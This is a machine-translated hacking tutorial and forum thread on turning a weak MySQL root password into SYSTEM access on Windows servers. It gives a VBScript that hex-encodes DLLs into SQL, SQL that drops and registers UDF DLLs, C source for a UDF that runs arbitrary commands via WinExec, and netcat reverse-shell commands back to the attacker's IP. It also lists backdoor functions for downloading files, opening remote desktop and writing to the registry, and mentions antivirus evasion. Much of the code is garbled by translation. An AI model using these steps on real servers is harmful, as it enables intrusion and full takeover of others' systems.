Use MySQL to improve Permissions

I had a webshell tutorial on the Internet with a weak MySQL password. But what I want to talk about this time is not to get webshell, but to directly get system permissions. I can see it clearly. It is to get it directly!

First, let me briefly talk about the process of obtaining system permissions with a weak MySQL password: first, use the MySQL script to upload the udf dll file, then use the function Self-written by registering the udf dll, and execute any command.

The idea is very simple. There are also some tutorials on the Internet, but they either didn't give specific code, or did it in a single sentence, which is hard to understand like me, after a few days of continuous testing, I finally handed over the detailed process and related code to you, so that you can write the DLL file by yourself, generate binary codes for different files by yourself!
Next, let's talk about how to generate a script to upload a binary file. Look at the MySQL script code (the method used by mix ):
Set @ A = Concat ('', 0x0123abc1312389 .....);
Set @ A = Concat (@ A, 0x00008978abc545e ......);
......................

Create Table mix (Data longblob); // create table mix. The field is data and the type is longblob.
Insert into mix values (""); Update Mix Set Data = @ A; // @ A insert Table mix
Select data from mix into dumpfile 'C: // winnt // file name'; // The exported table content is a file
The first two sentences are very familiar. This is the solution that we used to bypass during the injection and declare the hexadecimal number of the Code to a variable, then, import the variable. Here, because the hexadecimal code is the content of a file and the code is too long, the Concat function is used to add up the previous Code class, in this way, it is accumulated into a variable. The following sentence is simple. I have comments.

The last three sentences can be said, but the above hexadecimal data is too much. If it is done manually, it's tiring! But do you still remember the previous exe2bat. vbs script? This time we can modify this script and get the MySQL script we need here! Compare the files generated by exe2bat. vbs with the file format of the script we need, we can easily get the scripts we need. The script content is as follows:
Fp = wscript. Arguments (0
Fn = right (FP, Len (FP)-limit Rev (FP ,"/"))
With Createobject ("ADODB. Stream ")
. Type = 1:. Open:. loadfromfile FP: Str =. Read: SL = lenb (STR)
End
Sll = SL mod 65536: SLH = SL/65536
With Createobject ("scripting. FileSystemObject"). opentextfile (FP & ". txt", 2, true)
. Write "set @ A = Concat ('', 0x"
For I = 1 to SL
Bt = ASCB (midb (STR, I, 1 ))
If BT <16 then. Write "0"
. Write hex (BT)
If I mod 128 = 0 then. Write ");" + vbcrlf + "set @ A = Concat (@ A, 0x"
Next
End
Now, you can drag the file to be uploaded to the script icon to generate a TXT file with the same name. This TXT file is the MySQL script we need. Of course, we still need to modify this TXT file (after all, it's just what we get !), Delete the redundant statement "set @ A = Concat ('', 0x "generated in the last row. Add the table creation statement and insert the code worth the three statements!

How can I upload a script generated? Log on to the MySQL server first:
C:/> mysql-u root-H hostip-P
Mysql> use MySQL; // enter the default database of MySQL first. Otherwise, you will not know which database the next table belongs.
Mysql>/. E:/* .dll.txt; // here is your MySQL script
After entering the command above, you can see that the screen text is flashing fast (of course, the network speed is fast). Soon your file will be uploaded!

Next we will focus on what DLL files should we upload? Now I can see two DLL files on the Internet, one being mix. DLL, one is my_udf.dll written by envymask. I have used both of them, both of which are good, but they are also a little inadequate. Let's take a look at the specific use process!
Use mix. dll first:
Log on to MySQL and enter the following command:
Mysql>/. E:/mix.dll.txt;
Mysql> Create Function mixconnect returns string soname 'C: // windows // mix. dll ';
// The registered mixconnect here is the function implemented in our DLL file. We will use it to execute system commands!
Mysql> select mixconnect ('your ip', '000000'); // enter your bounce IP address and port
After a while, when you listen to the NC on port 8080, you will get a shell with system permissions! 1:

This is really good. Through the rebound, shell can pass through some firewalls. Unfortunately, this function is not well written and can only be executed once. After you connect to the database for the second time, when you run "select mixconnect ('your ip', '123');" again, the MySQL of the other party will be taken away! An error is reported, and the service is stopped!
Therefore, you have only one success to use mix. dll, and there is no chance to try again! In addition, according to my test, he does not seem to work on win2003's system.
Use my_udf.dll:
Mysql>/. C:/my_udf.dll.txt
Mysql> Create Function my_udfdoor returns string soname 'C: // winnt // my_udf.dll ';
// Similarly, my_udfdoor is also used to execute the system command function after we register it.
Mysql> select my_udfdoor (''); // you can enter the my_udfdoor parameter here, which is equivalent to activating this function.
Now you don't need to shut down the shell. Let's open another CMD and use:
D:/> NC hostip 3306
*
4. 0. *-nt x $ EO ~ Mcg f ** K // after you see this, enter "f ** K", which is the default password of my_udfdoor and cannot be changed by yourself
After a while, you will have shell with system permissions,
He is a hook Recv version, so he has a strong ability to penetrate the wall. I used this when the previous mix. dll failed to rebound. He really did not expect it! After entering the system, I found that it has a dual network card, which is v2.73 of the Alibaba Cloud firewall Personal Edition. It only opens port 3306 to the outside. Thus, my_udf.dll has a strong ability to penetrate the firewall! But he also has a bug, that is, after we connect to activate this function (that is, after the command "select my_udfdoor (''); "is used), whether or not you connect, as long:
Mysql> drop function my_udfdoor; then, MySQL reports an error and then fails,

Therefore, you cannot delete your traces when using this DLL file!
Finally, we can write a custom DLL file. Check whether the problem can be solved.

We only need to use the UDF sample of MySQL as a template! Let's look at his example:
# I nclude <stdlib. h>
# I nclude <Winsock. h>
# I nclude <mysql. h>
Extern "C "{
Char * my_name (udf_init * initid, udf_args * ARGs, char * is_null,

Char * error );
// Compatible with C
}
Char * my_name (udf_init * initid, udf_args * ARGs, char * is_null,

Char * error)
{
Char * Me = "my name ";
Return me;
// Call this UDF to return my name
}
Is it very simple? Well, we only need to modify it to have our own DLL file:
Here is a modified crackme:
# I nclude <stdlib. h>
# I nclude <windows. h>
# I nclude "mysql. H"
Extern "C" _ declspec (dllexport) char * sys_name (udf_init * initid, udf_args * ARGs, char * is_null, char * error); // sys_name is the function name, you can modify
_ Declspec (dllexport) char * sys_name (udf_init * initid, udf_args * ARGs, char * is_null, char * error) // Of course, sys_name here must also be changed!
{
Char me [256] = {0 };
If (ARGs-> arg_count = 1 ){
Strncpy (Me, argS-> ARGs [0], argS-> lengths [0]);
Me [ARGs-> lengths [0] = '/0 ';
Winexec (Me, sw_hide); // It is used to execute arbitrary commands
} Else
Strcpy (Me, "Do nonthing./N ");
Return me;
}
Okay, we can compile it into the sysudf. dll file! Let's use him to experiment!
View operation:
Mysql>/. C:/sysudf.dll.txt
Mysql> Create Function sys_name returns string soname 'C: // windows // sysudf. dll ';
Mysql>/. nc.exe.txt // upload nc.exe
Mysql> select sys_name('nc.exe-e cmd.exe my IP address 100 ');
// There is only one sys_name parameter, which specifies the system command to be executed
Okay. Let's see a reverse shell in win2003,
Of course, you can also run other commands without Rebounding the shell. However, no echo is displayed whether the command is executed successfully or not, so make sure that the command format is correct. After testing this DLL file, no error will be reported no matter when "Drop function sys_name;" is returned. You can also run different commands multiple times. As for his weakness, he is not too strong in the ability to penetrate the wall as well as mix. dll, but for a wall that is really hard to penetrate, it is the best choice to run other commands directly.

The above three DLL files are all short. How to choose them depends on your actual situation.

 

 

 

I. Functions: Use the custom functions of MySQL (I declare again that using MySQL UDF to escalate permissions is not an overflow, but a function of Mysql itself ), converts a MySQL account to a system permission.

II. Application scenarios: 1. the target system is Windows (Win2000, XP, win2003); 2. you already have a user account of MySQL. This account must have the insert and delete permissions on MySQL to create and discard functions (MySQL document primitives ).

Iii. Help:
Step 1: Upload the PHP file to the target machine and enter your MySQL account to connect.

Step 2: After the connection is successful, export the DLL file. Do not pay attention to the export path during export (generally any directory can be written without permission concerns). For MySQL or later versions, you must export the DLL to the system directory (Win or system32) of the target machine. Otherwise, you will see the "no paths allowed for shared library" error in the next step.

Step 3: use SQL statements to create functions. Syntax: Create Function Name (the function name can only be one of the following lists) returns string soname 'export DLL path'; For Versions later than mysql5.0, the DLL in the statement does not allow full paths. If you have exported the DLL to the system directory in step 2, you can omit the path and run the command normally, otherwise, you will see the "can't open shared library" error. In this case, you must re-export the DLL to the system directory.

Step 4: After correctly creating function functions, you can use these functions using SQL statements. Syntax: the name of the function created by the SELECT statement ('parameter list'). Each function has different parameters. You can use the name of the function created by the SELECT statement ('help '); to obtain the parameter list of the specified function.

Step 5: after use, you may need to delete the DLL exported in step 2. before deleting the DLL, delete the function you created in step 3, otherwise, the delete operation will fail. The SQL statement for deleting the function created in step 3 is: Drop function created function name.
Figure 5

Iv. Function Description:
Cmdshell executes cmd;
Downloader downloads the specified file online and saves it to the specified directory;
Open3389 General Open 3389 terminal service, you can specify the port (no need to restart without changing the port );
Backshell rebound shell;
Processview: Lists system processes;
Killprocess: terminates a specified process;
Regread read the registry;
Regwrite write the registry;
Shut down shut, log off, and restart;
About description and help functions;

-------------------

Reference the 13th floor programming King published on:
After reading the author's article, I took a server for experiment. The MySQL permission is connected by the root user, and the mysql version is 5.0, that is, the UDF. DLL is exported to the system directory. because MySQL is in MySQL 5.0, the first step is C:/Windows/UDF. DLL or C:/Windows/system32/UDF. ll? Or C:/Windows, C:/Windows/system32, I tried it all successfully, but in step 2, however, the error "no paths allowed for shared library" mentioned by the Lord appeared. It is already wrong to export it to the system directory. I tried to set the UDF again. the DLL cannot be changed to another DLL file. I don't understand it here,
The UDF. dll file exists in the windows and system32 directories. Why is it still wrong? Is it because of an error during the first export? Or is the format incorrect? Or is there a problem with my character? Wait for your answers .....

Haha, maybe I did not understand enough: "If you have exported the DLL to the system directory in step 2, you can omit the path to make the Command run normally"

You only need to export the file once. For example, you have exported the file to the C:/Windows directory. You can execute the create function using shell returns string soname 'udf. dll ';

The following DLL does not need to contain a path. If you export it to the system directory, you can find UDF. DLL without the path.

Quote:
An error occurred while executing the: create function returns string soname 'udf. dll 'database query. Check whether the SQL statement create function returns string soname 'udf. dll' syntax is correct. You have an error in your SQL syntax; check the manual that corresponds to your MySQL Server version for the right syntax to use near 'string soname' UDF. dll ''at line 1

Brother forgot to write the function name: You can try: Create Function example shell returns string soname 'udf. dll ';

Quote:
3389 cannot open the select open3389 ('123') syntax! Use other functions!

The program uses a general-purpose open 3389 program component, which I downloaded from the internet and did a simple kill-free operation. I am not very clear about the 3389 program itself, however, I tried several versions of virtual machines and thought the success rate was the best among the programs I could use. I imported them into my dll as a resource, I don't know the reason for this problem. If a friend has a better 3389 program, I can improve it.

Quote:
The following error occurred during the test! Fatal error: Maximum execution time of 30 seconds exceeded in C: appservwwwudf. php on line 91

Excluding server performance problems, it may be caused by anti-virus software on the server.